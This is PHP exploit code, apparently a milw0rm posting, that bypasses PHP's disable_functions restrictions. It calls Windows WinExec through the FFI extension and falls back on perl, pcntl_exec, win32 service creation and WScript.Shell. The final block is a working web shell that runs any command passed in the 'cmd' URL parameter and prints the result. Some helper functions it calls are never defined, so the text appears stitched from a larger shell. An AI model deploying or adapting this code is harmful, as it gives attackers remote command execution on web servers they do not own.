function ffishelL($command) { $name = whereistmP() . "\\" . uniqid('NJ'); $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res = $api->WinExec("cmd.exe /c {$command} >\"{$name}\"", 0); while (!file_exists($name)) { sleep(1); } $exec = file_get_contents($name); unlink($name); return $exec; }
function z6v($c) { global $win, $tempdir; $r = ''; if (!empty($c)) { if (!$win) { if (extension_loaded('perl')) { @ob_start(); $p = new perl(); $p->eval("system('{$c}')"); $r = @ob_get_contents(); @ob_end_clean(); } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) { $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n'; $o = $tempdir . uniqid('pcntl'); $pid = @pcntl_fork(); if ($pid == -1) { $r .= '[-] Could not fork. Exit'; } elseif ($pid) { $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.'; } else { $c = array(" -e 'system(\"{$c} > {$o}\")'"); if (@pcntl_exec('/usr/bin/perl', $c)) { exit(0); } if (@pcntl_exec('/usr/local/bin/perl', $c)) { exit(0); } die; } $r = z9p($o); @unlink($o); } } else { $o = $tempdir . uniqid('NJ'); if (extension_loaded('ffi')) { $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } elseif (extension_loaded('win32service')) { $s = uniqid('NJ'); @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\"")); @win32_start_service($s); @win32_stop_service($s); @win32_delete_service($s); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } elseif (extension_loaded("win32std")) { @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"'); while (!@file_exists($o)) { sleep(1); } $r = z9p($o); } else { $a = new COM("WScript.Shell"); $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"'); $r = z9p($o); } @unlink($o); } } return $r; }
if (!extension_loaded('ffi')) { die('ERROR: FFI extension is not loaded!'); } $command = empty($_GET['cmd']) ? 'dir' : $_GET['cmd']; if (is_writeable(dirname(__FILE__))) { $tmp = dirname(__FILE__); } elseif (is_writeable(ini_get('session.save_path'))) { $tmp = ini_get('session.save_path'); } elseif (is_writeable(ini_get('upload_tmp_dir'))) { $tmp = ini_get('upload_tmp_dir'); } else { die('ERROR: Move exploit to writeable folder.'); } $output = "{$tmp}\\" . uniqid('NJ'); $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res = $api->WinExec("cmd.exe /c {$command} >\"{$output}\"", 0); while (!file_exists($output)) { sleep(1); } $con = ''; $fp = fopen($output, 'r'); while (!feof($fp)) { $con .= fgets($fp, 1024); } fclose($fp); $con = htmlspecialchars($con); echo "<pre>{$con}</pre>"; unlink($output); ?> # milw0rm.com [2007-08-23]